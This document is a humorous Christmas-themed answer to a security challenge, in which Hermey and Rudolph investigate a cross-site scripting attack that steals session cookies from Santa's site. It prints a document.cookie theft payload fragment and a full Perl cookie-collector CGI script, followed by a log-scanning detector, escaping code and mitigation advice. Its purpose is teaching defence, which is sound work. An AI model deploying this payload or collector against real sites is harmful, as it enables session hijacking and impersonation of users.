
By Kenn Crook.

Yes Virginia, there IS information security at the North Pole.

It was late into the cold, cold night when Hermey and Rudolph first noticed the attack in their web logs. Thinking quickly, but remaining calm, Hermey immediately pulled out his incident handling checklist while Rudolph, blaring away with his rosy proboscis, flew off to notify Santa that there was trouble ahoof.

At first, Hermey wasn't sure what kind of attack he was dealing with. He decided to do a Google search of what he felt were the most important elements of the attack so that he might get a clue as to what this naughty intruder was doing. Firing up his trusty Linux desktop and entering [grab.cgi?'+document.cookie] into the search engine brought back only 4 responses, but they did look promising. They all mentioned a URL http://peacefire.org/holder/grab.cgi?\" + bookmarklink\'

While this wasn't exactly what Hermey saw in the web logs, he figured it was close enough for starters, so he clicked on the link and read on. It seemed to be a demo of something called Cross-Site Scripting. Hmm... he'd never heard of that before. He bet that CERT (one of his favorite sites) might have some useful information about this. Browsing over to CERT's site, he came upon an advisory from February 2000, http://www.cert.org/advisories/CA-2000-02.html, about this sort of thing. In reading over the information as well as a few other articles on the subject, Hermey was pretty sure he knew what was going on. Meanwhile, Santa was lamenting the news that Rudolph had given him.

"Tell Hermey to shut this little 'darling' down. I want to know how it was done and I want to stop it from happening anymore. But for now, I'm going to go over the database records and see if anything has been changed. After all... I know who's been naughty and nice," the jolly old elf stated.

Rudolph flew back to the workshop where Hermey was burning the midnight oil.

"Santa says he wants this intruder shut down. Do you know what they're doing yet?" Rudolph inquired.

"Sure do, Rudy. They were using a JavaScript XSS exploit to grab our cookies. After they got hold of them they could log into a session and masquerade as us. We'd be, well, let's just say hanging out in the wind." Hermey told his four-legged friend.

"What's that first thing, with the <IMG> tag?" Rudolph inquired, covering his nose so that the red glare didn't make the screen unreadable.

"Well, they could have tried to use that tag as an exploit as well with JavaScript, but it looks to me like they were just seeing if our site was vulnerable to XSS. See, if they can put in a foreign URL and it gets parsed like it was from this site... then you're vulnerable." Hermey shook his head. Who could do such a thing, he thought. "Here, I found a nice PowerPoint by Ed Skoudis that sums up the whole XSS thing," he offered.

"Ed Skoudis?" Rudolph asked, "Isn't he the author of Malware: Fighting Malicious Code?"

"Indeed he is Rudy, and don't forget Counter Hack." Hermey added, putting a copy of both books by his face and smiling to the 'camera'.

"So, what can we do to fix this?" Rudolph asked.

"Well, first off we need to disable JavaScript execution on all of our browsers while our Web-Elf gets the site re-coded. He needs to either not reflect back user input or filter it in such a way as to eliminate unintentional code execution," Hermey stated. "And we should change the format of our cookies just to make sure that any that were stolen wouldn't still work here. Too bad we can't firewall off the intranet applications… but with all the melting it causes…" Hermey said sadly, remembering the mess he'd caused a while back with that sort of thing.

"Luckily we have that magic pixie dust we purchased from those Big Blue Pixies. We can just sprinkle some of that on our servers and the code will be fixed." Rudolph stated.

"Yes, luckily." Hermey nodded.

Just then Santa burst in. "I have found our culprit!" he stated flatly.

"REALLY? How???" Both Rudolph and Hermey would never cease to be amazed by the old elf.

"I went through all the database records..."

"But there are like a billion..." Hermey interrupted.

Santa quieted Hermey with a look that made the curl in his toes go temporarily limp.

"I KNOW how many there are... But if I can fly around the world and visit them in just one night, don't you think I'd be able to cross-reference a relational database pretty quickly?"

"Oh, yeah... good point Boss. Uhm... so, who was it, er is it?" Hermey stammered.

"Here's the record, changed from 'Lump of Coal' to 'All expense paid vacation for 2 to Maui'," Santa stated, pointing to the difference between today's printout and one from a backup.

"Kris Eebler!" Hermey exclaimed, looking at the name and address. "I always knew that elf was up to no good. And his fascination with cookies, yes, it all makes sense! But that's not the address for the Little Tree that he and those 'defectors' of his used to live in." Hermey scratched his head.

"No, quite right little Hermey. The other elves in the Little Tree kicked him out. I just got off the phone with them. Apparently, he's gotten even more surly than when he lived here. He's living in some tenement housing and hitting the bottle from what they say." Santa told them.

"I've confirmed it!" shouted Rudolph with glee, his nose approaching a near apocalyptic brightness. "I did a whois search on www.bumblesnowmonster.com and here's what I get:

      Organization Name:
      Name: K. Eebler
      Address: 3030 Low Rent Drive
      Kississime, FL 34744
      Email Address: bitemesanta@bitterelves.com
      Phone Number: 5553331234
      Fax Number:

      Administrative Contact

      Name: K. Eebler
      Address: 3030 Low Rent Drive
      Kississime, FL 34744
      Email Address: bitemesanta@bitterelves.com
      Phone Number: 5553331234
      Fax Number:

      Technical Contact

      Name: K. Eebler
      Address: 3030 Low Rent Drive
      Kississime, FL 34744
      Email Address: bitemesanta@bitterelves.com
      Phone Number: 5553331234
      Fax Number:

      Billing Contact

      Name: K. Eebler
      Address: 3030 Low Rent Drive
      Kississime, FL 34744
      Email Address: bitemesanta@bitterelves.com
      Phone Number: 5553331234
      Fax Number:

      Record Created on........ 2002-12-26 08:59:36.000
      Record last updated on... 2002-12-26 15:08:18.000
      Expire on................ 2003-12-26 00:00:00.000

      Domain servers in listed order:

"Rudolph!" Santa bellowed.

"Yes, sir!" Rudolph sprang to attention.

"I want you to go and bring back this miscreant. We're going to show him some justice Santa-style. I'm going to let him know what the North Pole is really used for..." Santa chuckled in a way that made everyone shiver... which is a hard thing to do when you're used to being that far North.

Rudolph immediately sprang into the air and flew towards Florida. Narrowly avoiding some late night fireworks over a nearby castle, Rudolph headed for the seedy side of Kississime. Finding no one home at 3030 Low Rent Drive, Rudolph flew down the air vent (no chimney in sight) and into the 4th story apartment. There, downloading the incriminating evidence from the evil elf's FreeBSD computer (he'd left it logged in running nmap) he found the following script:

      #!/usr/bin/perl
      # grab.cgi -- the cookie collector Rudolph found: it records whatever
      # the victim's browser appended to the query string.

      # The stolen cookie arrives URL-encoded in the query string.
      $grabbed_cookie = $ENV{'QUERY_STRING'};
      # Decode %XX escapes back into the raw characters.
      $grabbed_cookie =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

      # Append the decoded cookie to a log file; if the file can't be opened,
      # an error page is emitted instead.
      open(KEEBLER_LOG, ">>keebler_log") or print "Content-type: text/html\n\n oop ack\n";
      print KEEBLER_LOG "$grabbed_cookie\n";
      close(KEEBLER_LOG);
      # Return an empty page so the victim's browser shows nothing unusual.
      print "Content-type: text/html\n\n";

Rudolph gazed across the filthy apartment looking for more clues as to where the misguided elf might be. Several empty containers of Egg Nog and cookie boxes were strewn about the room. Napkins, coasters and shot glasses from a nearby snack bar were also littering the floor. Rudolph headed off to see if he could find Eebler there. Wrapping a towel around his nose, he flew down to the nearby snack bar and snuck up to the bar's doorway to listen for that familiar, high-pitched voice. He could hear the elf harassing some young girl.

"Listen baby, I can get you off the Naughty List. C'mon, even Santa doesn't make candy as sweet as you."

"No. Leave me alone!" she implored.

"Yeah, yeah... a thimbleful of Nog and I'm a wildman. Sorry, toots."

Rudolph couldn't take it anymore. Magically creating the sound of Carl Orff's "O Fortuna" (every hero has to have theme music), he burst into the bar, nose blazing. His shiny honker filled the room with an ominous, ruddy, evil-esque glow. Rudolph stood silhouetted in the doorway, fuming at the cowering elf. "Come with me if you want to live," he told Eebler, offering the elf his hoof. Kris got to his feet and looked over at the girl he'd been harassing. "You'd look great in a Raggedy Ann wig," he offered.

"Go!" she shouted, pointing toward the door.

He thought about using some of his elfin magic to escape… but knew things would go worse for him when he was caught. Dejected, he returned with Rudolph to the North Pole to face the music. After intense psychotherapy it was determined that the whole "Cookies and Milk for Santa" thing had thrown him over the edge. After his punishment was over (pole-sitting for a few months along with those Big Blue Pixies whose dust didn't seem to work as advertised) he and Santa worked out an agreement that lowered Santa's carb intake and satisfied the elf's insatiable appetite for cookies.

The End.

    What is the purpose of the first malicious wish text, and how does it work?

The first wish text was to confirm whether XSS was doable against Santa's new site. By seeing whether the <IMG> tag was rendered as HTML when it was echoed back, Eebler was able to determine that the site was prime for XSS.

    What is the purpose of the second malicious wish text, and how does it work?

Grabbing delicious cookies. Yum! By using JavaScript executed in the context of the user's browser, it was able to write the contents of their cookies out to the cookie-loving elf's CGI script (see grab.cgi above).
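Hermey first spotted both wish texts in the web logs, so a small log check is the natural defender's complement to the two answers above. The following is an added example, not part of the original write-up: it parses Common Log Format lines, URL-decodes the query string, and flags requests carrying the indicators the story describes (an HTML tag such as <IMG> being submitted as a wish, a reference to document.cookie, and the grab.cgi collector). The log lines, IP addresses, hostnames and the /wish.cgi path are constructed for the example.

```python
"""Flag web-log requests that look like reflected-XSS probes or cookie theft.

Added example; not code from the original write-up. The sample log lines,
addresses and paths below are constructed.
"""
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Common Log Format: host ident user [time] "METHOD TARGET PROTO" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators checked against the decoded query string.
INDICATORS = {
    "html_tag":       re.compile(r"<\s*(img|script)\b", re.I),  # markup submitted as a "wish"
    "cookie_access":  re.compile(r"document\.cookie", re.I),    # script reading the cookie jar
    "cookie_dropbox": re.compile(r"grab\.cgi", re.I),           # the collector seen in the story
}


def decode_query(target):
    """Return the query string decoded; attackers normally URL-encode the payload."""
    query = urlsplit(target).query
    # First pass handles form encoding ('+' as space), second pass catches
    # a double-encoded payload meant to slip past a naive filter.
    return unquote(unquote_plus(query))


def flag_request(line):
    """Return (host, target, [indicator names]) for a suspicious line, else None."""
    m = CLF_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return (m.group("host"), m.group("target"), hits)


def scan_log(lines):
    """Run flag_request over every line and keep the hits."""
    return [hit for hit in map(flag_request, lines) if hit]


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.7 - - [24/Dec/2003:23:41:02 -0500] "GET /wish.cgi?wish=a+new+sled HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Dec/2003:23:42:11 -0500] "GET /wish.cgi?wish=%3CIMG+SRC%3D%22http%3A%2F%2Fexample.invalid%2Fx.gif%22%3E HTTP/1.1" 200 640',
    '10.0.0.9 - - [24/Dec/2003:23:45:37 -0500] "GET /wish.cgi?wish=grab.cgi%3F%27%2Bdocument.cookie HTTP/1.1" 200 601',
    '10.0.0.7 - - [24/Dec/2003:23:46:00 -0500] "GET /images/snow.gif HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for host, target, hits in scan_log(SAMPLE_LOG):
        print(f"{host} {target} -> {', '.join(hits)}")
```

Run against the sample, the first wish from 10.0.0.9 is reported as an html_tag probe and the second as cookie_access plus cookie_dropbox, while the ordinary wish and the image fetch pass through untouched. Decoding before matching matters: the raw log line never contains a literal "<", so a grep on the undecoded text would miss the probe.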

    How could Hermey and Rudolph thwart the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves' browsers?

They could either not reflect user input as output in the web application and/or filter out all characters that are meaningful in scripting languages. The easiest approach is to define the characters that are acceptable (alphanumerics) and filter out everything else. Alternatively, they could disable scripting support in their browsers, though this is problematic since a lot of legitimate sites use things like ActiveX, JavaScript and the like. However, if these machines were dedicated to only this purpose and the browsers didn't need script execution, then it should be disabled in any case.
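To make the application-side fix concrete, here is an added example (not code from the original write-up) showing the vulnerable reflection beside the two remedies the answer above names: HTML-encoding the echoed text, and allowlisting alphanumerics and dropping everything else. The page template, the render_* function names and the wish strings are constructed for the example; the probe string is the kind of <IMG> tag the story describes.

```python
"""Reflecting a submitted wish: the vulnerable form beside two fixes.

Added example; not code from the original write-up. The template and the
wish strings are constructed.
"""
import html
import re

# Stand-in for the page the wish-list CGI sends back.
PAGE = "<html><body><p>Your wish: {wish}</p></body></html>"


def render_unsafe(wish):
    """Echo the raw submission into the HTML: any tag in `wish` is rendered as markup."""
    return PAGE.format(wish=wish)


def render_escaped(wish):
    """Keep every character but HTML-encode it, so '<' is sent as '&lt;' and shown as text."""
    return PAGE.format(wish=html.escape(wish, quote=True))


# Allowlist: letters, digits, space and a little sentence punctuation; all else is dropped.
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9 .,!?]")


def render_allowlisted(wish, max_len=200):
    """'Define what is okay and filter everything else', then escape anyway (defence in depth)."""
    cleaned = NOT_ALLOWED.sub("", wish)[:max_len]
    return PAGE.format(wish=html.escape(cleaned, quote=True))


def renders_as_markup(page):
    """True if an IMG tag survives unescaped in the response body, i.e. the probe 'worked'."""
    return re.search(r"<img\b", page, re.I) is not None


# Constructed inputs: a normal wish and a markup probe of the kind the story describes.
NORMAL_WISH = "A red wagon, please!"
PROBE_WISH = '<IMG SRC="http://example.invalid/x.gif">'

if __name__ == "__main__":
    for name, render in [("unsafe", render_unsafe),
                         ("escaped", render_escaped),
                         ("allowlist", render_allowlisted)]:
        print(f"{name:9s} probe reflected as markup: {renders_as_markup(render(PROBE_WISH))}")
```

Of the two fixes, encoding on output is the one that preserves the child's wish exactly as typed; the allowlist is stricter and loses legitimate characters (an apostrophe, a hyphenated toy name), which is the trade-off the answer's "easiest" hints at. Applying the encoder even after allowlisting costs nothing and protects against a later loosening of the allowlist.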

    Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?

Reading email in a non-HTML format (plain text) would be the best way. Another way would be to make sure that things like the preview pane and the like are disabled so that code isn't automatically run. Using a client that isn't intimately tied to the OS (i.e., anything but Outlook) will also go a long way towards mitigating these kinds of problems. Of course, disabling the aforementioned scripting capabilities in the client (which very well might be a browser) will stop this as well.

Kenn Crook

©Copyright 2004, Ed Skoudis